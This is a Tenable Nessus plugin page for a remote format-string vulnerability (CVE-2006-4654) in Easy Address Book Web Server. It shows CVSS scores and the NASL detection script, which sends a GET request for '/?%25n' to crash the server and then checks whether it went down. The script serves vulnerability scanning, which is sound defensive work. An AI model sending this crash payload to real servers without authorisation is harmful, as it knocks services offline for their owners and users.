Lucene search

K
nessusThis script is Copyright (C) 2006-2021 Tenable Network Security, Inc.EABWS_ARG_FORMAT_STRING.NASL
HistorySep 05, 2006 - 12:00 a.m.

Easy Address Book Web Server Query Remote Format String

2006-09-0500:00:00
This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.
www.tenable.com
7

CVSS2

5.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:H/Au:N/C:P/I:P/A:P

EPSS

0.037

Percentile

91.8%

It appears that the remote web server is affected by a remote format string issue. Using a specially crafted URL containing a format string specifier, an unauthenticated, remote attacker can crash the affected application and possibly execute arbitrary code on the remote host.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(22305);
  script_version("1.22");

  script_cve_id("CVE-2006-4654");
  script_bugtraq_id(19842);

  script_name(english:"Easy Address Book Web Server Query Remote Format String");
  script_summary(english:"Tries to crash Easy Address Book Web Server");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a format string vulnerability." );
 script_set_attribute(attribute:"description", value:
"It appears that the remote web server is affected by a remote format
string issue.  Using a specially crafted URL containing a format
string specifier, an unauthenticated, remote attacker can crash the
affected application and possibly execute arbitrary code on the remote
host." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/445262/30/0/threaded" );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/09/05");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/09/05");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();


  script_category(ACT_DENIAL);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);


# Make sure it looks like Easy Address Book Web Server.
banner = get_http_banner(port:port);
if (!banner || "Server: Easy Address Book Web Server" >!< banner)
 exit(0, "The web server on port "+port+" is not Easy Address Book Web Server.");

# Try to exploit the flaw to crash the server.
if (http_is_dead(port:port))
 exit(1, "The web server on port "+port+" is dead already.");

r = http_send_recv3(method:"GET",item:"/?%25n", port:port, exit_on_fail: 0);

# There's a problem if the server is now down.
sleep(1);
if (http_is_dead(port:port)) security_warning(port);

CVSS2

5.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:H/Au:N/C:P/I:P/A:P

EPSS

0.037

Percentile

91.8%

Related for EABWS_ARG_FORMAT_STRING.NASL